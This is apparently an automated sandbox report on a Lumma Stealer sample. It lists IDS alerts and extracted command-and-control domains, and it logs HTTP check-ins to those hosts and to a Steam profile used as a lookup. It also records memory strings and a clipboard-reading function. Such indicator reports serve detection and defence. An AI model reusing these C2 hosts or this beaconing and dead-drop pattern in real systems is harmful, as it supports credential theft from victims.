    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49837 -> 172.67.206.204:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49790 -> 104.21.77.78:443
    Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49826 -> 104.102.49.254:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49813 -> 104.21.79.35:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49813 -> 104.21.79.35:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49806 -> 172.67.173.224:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49806 -> 172.67.173.224:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49790 -> 104.21.77.78:443
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49799 -> 172.67.140.193:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49799 -> 172.67.140.193:443
    Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49843 -> 172.67.206.204:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49843 -> 172.67.206.204:443
    Source: Malware configuration extractor | URLs: condifendteu.sbs
    Source: Malware configuration extractor | URLs: allocatinow.sbs
    Source: Malware configuration extractor | URLs: ehticsprocw.sbs
    Source: Malware configuration extractor | URLs: vennurviot.sbs
    Source: Malware configuration extractor | URLs: divewanntwj.biz
    Source: Malware configuration extractor | URLs: drawwyobstacw.sbs
    Source: Malware configuration extractor | URLs: enlargkiw.sbs
    Source: Malware configuration extractor | URLs: resinedyw.sbs
    Source: Malware configuration extractor | URLs: mathcucom.sbs
    Source: Joe Sandbox View | IP Address: 188.114.97.3
    Source: Joe Sandbox View | IP Address: 104.21.33.249
    Source: Joe Sandbox View | IP Address: 188.114.96.3
    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
    Source: Joe Sandbox View | ASN Name: AKAMAI-ASUS
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: divewanntwj.biz
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: mathcucom.sbs
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: enlargkiw.sbs
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: resinedyw.sbs
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: vennurviot.sbs
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: ehticsprocw.sbs
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: condifendteu.sbs
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: drawwyobstacw.sbs
    Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: sergei-esenin.com
    Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Cookie: __cf_mw_byp=bxMlIAxRNFAWJgPn4rB1sAax3Kr_T1ZtpPoatisDzkE-1728776609-0.0.1.1-/api | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 46 | Host: sergei-esenin.com
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: divewanntwj.biz
    Source: global traffic | DNS traffic detected: DNS query: mathcucom.sbs
    Source: global traffic | DNS traffic detected: DNS query: allocatinow.sbs
    Source: global traffic | DNS traffic detected: DNS query: enlargkiw.sbs
    Source: global traffic | DNS traffic detected: DNS query: resinedyw.sbs
    Source: global traffic | DNS traffic detected: DNS query: vennurviot.sbs
    Source: global traffic | DNS traffic detected: DNS query: ehticsprocw.sbs
    Source: global traffic | DNS traffic detected: DNS query: condifendteu.sbs
    Source: global traffic | DNS traffic detected: DNS query: drawwyobstacw.sbs
    Source: global traffic | DNS traffic detected: DNS query: steamcommunity.com
    Source: global traffic | DNS traffic detected: DNS query: sergei-esenin.com
    Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: divewanntwj.biz
    Source: Setup.exe, program.js.0.dr | String found in binary or memory: http://json-schema.org/draft-07/schema
    Source: program.js.0.dr | String found in binary or memory: http://json-schema.org/draft-07/schema#
    Source: Setup.exe, program.js.0.dr | String found in binary or memory: http://json-schema.org/schema
    Source: Setup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://jsperf.com/1-vs-infinity
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://allocatinow.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://allocatinow.sbs/3l
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://allocatinow.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://allocatinow.sbs/api1
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://allocatinow.sbs/co
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://allocatinow.sbs/pi
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: Setup.exe, program.js.0.dr | String found in binary or memory: https://aws.amazon.com
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=e
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
    Source: BitLockerToGo.exe, 00000002.00000003.2297598155.00000000031AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://divewanntwj.biz/api
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ehticsprocw.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ehticsprocw.sbs/li3
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://enlargkiw.sbs/
    Source: Setup.exe, program.js.0.dr | String found in binary or memory: https://github.com/aws/jsii
    Source: Setup.exe, program.js.0.dr | String found in binary or memory: https://github.com/aws/jsii.git
    Source: Setup.exe, program.js.0.dr | String found in binary or memory: https://github.com/aws/jsii/issues
    Source: program.js.0.dr | String found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
    Source: Setup.exe, 00000000.00000002.2279698242.0000000003E1E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://jsperf.com/object-keys-vs-for-in-with-closure/3
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2297598155.00000000031AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mathcucom.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mathcucom.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2297775302.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mathcucom.sbs/apij
    Source: program.js.0.dr | String found in binary or memory: https://raw.githubusercontent.com/ajv-validator/ajv/master/lib/refs/data.json#
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://resinedyw.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://resinedyw.sbs/api
    Source: BitLockerToGo.exe, 00000002.00000003.2319556533.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://resinedyw.sbs:443/apii
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.0000000003188000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/api
    Source: BitLockerToGo.exe, 00000002.00000002.2400111218.000000000319C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sergei-esenin.com/apiC
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/workshop/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/about/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/explore/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/legal/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/mobile
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/news/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/points/shop/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/stats/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: BitLockerToGo.exe, 00000002.00000003.2338992409.00000000031D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://vennurviot.sbs/
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: BitLockerToGo.exe, 00000002.00000003.2386774263.000000000323D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
    Source: unknown | Network traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknown | Network traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49763 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49774 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.33.249:443 -> 192.168.2.6:49780 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.77.78:443 -> 192.168.2.6:49790 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.140.193:443 -> 192.168.2.6:49799 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.173.224:443 -> 192.168.2.6:49806 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.79.35:443 -> 192.168.2.6:49813 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49819 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49826 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49837 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.6:49843 version: TLS 1.2
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00436F40 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard

    System Summary

    Source: 00000000.00000003.2197228069.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents | Author: Florian Roth
    Source: 00000000.00000002.2281733359.0000000004100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents | Author: Florian Roth
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004112A3
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00443D4F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_00401000
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0041900F
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040F0C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004150C0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_0040A0E0
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 2_2_004410E0
